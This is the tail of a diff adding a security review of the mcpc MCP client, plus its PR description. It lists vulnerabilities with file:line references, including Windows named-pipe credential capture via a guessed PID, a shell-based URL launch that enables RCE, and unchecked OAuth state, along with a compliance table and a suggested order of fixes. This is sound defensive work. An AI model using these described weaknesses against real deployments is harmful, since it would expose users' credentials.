+- **L23. Documentation contradictions.** "HTTPS enforced (auto-upgraded from HTTP)" (`README.md:1352`) overstates `normalizeServerUrl`, which only adds a scheme when none is given; "no secrets visible in `ps aux`" (`:1345`) is true for the bridge only; README `:1368` claims orphaned processes are cleaned up while CLAUDE.md says they are not (the code cleans sockets and logs only); `reconnecting` is described differently in README and CLAUDE.md (README is right); elicitation is "planned" in README `:869` but `test/conformance/README.md:63-65` says mcpc will never prompt; `.npmignore` excludes `docs/` so the npm README's relative links break; `skills/record-demo/` ships in the tarball because there is no `files` allowlist.
+- **L24. Dependency posture.** Two MCP SDK majors at runtime (v1 only for `--proxy`, could be lazy-loaded and later replaced by `@modelcontextprotocol/server@2`); `qrcode-terminal` last released 2018; `c8` and `nyc` both present alongside `@vitest/coverage-v8`; pnpm `minimumReleaseAge` (3 days) and Renovate (7 days) disagree; no `package.json` `files` allowlist.
+
+---
+
+## Info
+
+- **Windows named pipes** (`utils.ts:144-149`, `bridge/index.ts:1227`): the pipe name is predictable (home hash, session name, PID), Node creates it with the default security descriptor, and the IPC protocol has no client authentication. `handleMessage` (`bridge/index.ts:1286-1346`) accepts `shutdown`, `set-auth-credentials`, `set-x402-wallet` and arbitrary MCP requests from any connection at any time. On Unix the `0700` socket directory and ownership-checked temp fallback make this fine. On Windows a pre-created pipe with a guessed PID could make the bridge's listen fail while `waitForFile` (`bridge-manager.ts:308-313`) still sees the pipe and delivers credentials to it. Not verified here; worth a Windows-specific test, an explicit DACL, or a nonce handshake.
+- **Stdio child environment is an allowlist** (SDK `stdio.mjs:68-72` merges `getDefaultEnvironment()` with the config `env`), so `NODE_TLS_REJECT_UNAUTHORIZED=0` from `--insecure` does not leak into stdio servers. Good.
+- **Startup path is lean.** Only `chalk`, `commander` and `proper-lockfile` are statically imported by the CLI; the SDK, keyring, undici, ora and viem are dynamic. `mcpc --version` is about 0.33 s.
+- **Callback server has no timeout;** an unattended non-TTY login holds the loopback port forever. The success page says "profile has been securely saved" before the code exchange runs (`oauth-flow.ts:336-345`).
+- **id-jag SSO** never checks the ID token's `iss`/`aud` and skips the nonce check when the IdP omits `nonce` (`id-jag-login.ts:195-205`); low impact because the token only goes back to the same IdP. IdP requests send `client_id` in both body and Basic auth (`id-jag.ts:77-89`), which some IdPs reject.
+- **`probeKeychain`** writes and deletes a probe entry in every process that touches credentials (`keychain.ts:100-113`), including bridge refresh; on macOS that is an extra Keychain interaction per process.
+- **Bare `mcpc` and `mcpc grep`** fire-and-forget `reconnectCrashedSessions`, which re-executes stdio commands from `sessions.json`. By design, but listing sessions is not expected to spawn processes; worth a line in the skill.
+- **PEM private keys stored as one keychain blob** may exceed the Windows Credential Manager size limit for RSA-4096 (`keychain.ts:340`). Unverified.
+- Dead code: `grep.ts:494` `sessionRef` fallback, `utils.ts` `isValidResourceUri`/`parseJson`/`stringifyJson`, `output.ts:1580` `logTarget`, the unreachable `tokenManager` branch in `updateTransportAuth` (`bridge/index.ts:410-421`).
+
+---
+
+## Alignment with MCP security guidance (2026-07-28)
+
+| Guidance | Status | Notes |
+|---|---|---|
+| Local HTTP servers validate Origin; 403 on invalid | Yes | Proxy (`proxy-server.ts:128-142`) and OAuth callback Host check. Missing Origin allowed for non-browser clients, which is the intended reading. |
+| Bind to localhost | Default yes | `0.0.0.0` allowed with no token requirement (M4). |
+| Authenticate all connections to a local server | Optional | Token off by default (M4). |
+| Never open URLs through a shell | No | `cmd.exe /c start` on Windows (H1). |
+| Allowlist `http`/`https` for authorization URLs | No | Neither mcpc nor the SDK checks the scheme (H1). |
+| PKCE S256, refuse if AS lacks PKCE support | Partial | SDK uses S256 and checks `code_challenge_methods_supported` only when present; the spec says refuse when absent. |
+| `resource` parameter on authorization and token requests | Partial | Sent at login by the SDK; absent on the hand-rolled refresh (H5). |
+| Verify `state`, discard mismatches | No | Generated but not checked (M1). |
+| RFC 9207 `iss` validation | Yes | Passed through to the SDK at login. |
+| HTTPS for all OAuth endpoints except loopback | Partial | SDK enforces on login; hand-rolled refresh and `--token-endpoint` do not (H5, L5). |
+| Redeem codes and refresh tokens only at the recorded AS (mix-up) | Login yes, refresh no | H5. |
+| Secure token storage | Yes | Keychain with `0600` fallback. |
+| Block private IP ranges during OAuth discovery (clients deployed to servers) | No | No SSRF mitigation; mcpc is explicitly aimed at CI and agent hosts, so worth a follow-up. |
+| Consent before running local server commands from configuration | Partial | Bulk connect skips stdio unless `--stdio`; single-entry connect spawns without showing the command; HTTP entries carrying secrets need no consent (H3). |
+| Treat tool descriptions and annotations as untrusted | Not surfaced | Printed verbatim with no marker or sanitisation (M10, M17). |
+| Keep local server IPC access restricted | Unix yes, Windows unverified | See Info. |
+
+---
+
+## What is done well
+
+- Header credentials: keychain storage, IPC delivery after spawn, argv sanitisation, redaction in `sessions.json` and every `--json` view; keychain reads happen before `spawn()` to avoid the macOS prompt race; logs record `present`/`MISSING`.
+- `~/.mcpc` is `0700`, every credential-bearing file is `0600`, `sessions.json` and `profiles.json` are written temp-plus-rename under a lock with stale handling, corrupt files are quarantined rather than overwritten, and the temp-dir socket fallback verifies ownership.
+- The OAuth login leg delegates PKCE S256, `iss` validation and discovery-state binding to the SDK; CIMD-first client identification with a hosted document whose redirect URIs are unit-tested; strict CIMD URL validation; excellent registration-failure remediation text; every interpolation in the callback HTML is escaped; the callback binds the `127.0.0.1` literal and validates Host.
+- No shell anywhere except H1; stdio children get an allowlisted environment; `execFile` with array arguments throughout.
+- Retry semantics are right where it matters: tool calls are never re-executed after a socket loss, IPC timeouts are never retried, `callToolWithTask` falls back to polling a known task id.
+- Server abuse is bounded: pagination has a cycle guard and a 1000-page cap, `ttlMs` is clamped, resource-update bursts coalesce, the server cannot influence the resource-sync target path, atomic rename replaces symlinks rather than following them, binary content is never dumped to a TTY.
+- Era awareness for `--task`, `logging-set-level` and `server/discover` is consistent and comes from a dependency-free module.
+- Help text is the real source of truth: `docs/REFERENCE.md` is generated and CI-checked, and every command documents its `--json` shape.
+- Release pipeline: fail-closed dependency-age gate, npm provenance, conformance gate, no direct-publish escape hatch, un-minified reviewable viem bundle.
+
+---
+
+## Suggested order of work
+
+1. **H1** Windows URL opening: scheme allowlist plus a non-shell launcher. Small change, closes an RCE.
+2. **H4** Credential leaks: `config.ts:97`, `transports.ts:61`, the argv banner, stdio `env`/`args` through keychain and IPC, `0600` log files, tool-argument keys only.
+3. **H3** Treat project-scope configs as untrusted in bulk connect; restrict `${VAR}` in `url`; apply `-H` only to single connects; document.
+4. **H2** x402: asset pinning, per-payment and per-session caps, expiry clamp, explicit approve step, receipts, key on stdin.
+5. **H5 + M3** Persist the login-time authorization server and refresh only there; send `client_secret` and `resource`; single-flight and cross-process lock; separate network errors from auth errors.
+6. **M1 + M2** Verify `state`, ignore mismatches, attach rejection handling; defer client-registration writes.
+7. **M5, M6, M8** Bridge lifecycle: verify PID identity before killing, wait for the real teardown budget, take a restart lease.
+8. **M7, M9** IPC: typed error on oversized responses, `StringDecoder` framing.
+9. **M10** One terminal sanitiser at every untrusted sink; fence lengthening.
+10. **M15, M16, M17** Fix the help text and the skill; narrow `allowed-tools`; add untrusted-content and config-discovery warnings.
+11. **M18** Pin actions to SHAs, `permissions:` blocks, `persist-credentials: false`.
+12. **M4, M11, M12, M13, M14, M19** and the Low list as time allows.


### PR DESCRIPTION
Adds `docs/security-review-2026-09.md`, a deep security, correctness and design review of mcpc 0.6.0 at `833e584`, checked against the MCP 2026-07-28 security guidance, OAuth 2.1 and RFC 9700. Docs only, no code changes.

- 5 High, 19 Medium, 24 Low findings, each with `file:line` references and a suggested fix
- Highs: `cmd.exe` browser launch on Windows, uncapped x402 payments, `${VAR}` expansion from repo-committed configs, credential leaks into verbose output/argv/logs, refresh-token endpoint rediscovered from the MCP server origin
- Table mapping MCP security recommendations to mcpc's current status, plus a "done well" section and a suggested order of work
- Meant as the baseline for follow-up fix PRs; no originating issue, the review was requested directly

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01LAW5MNbAZQ8L1u4VnV7NYJ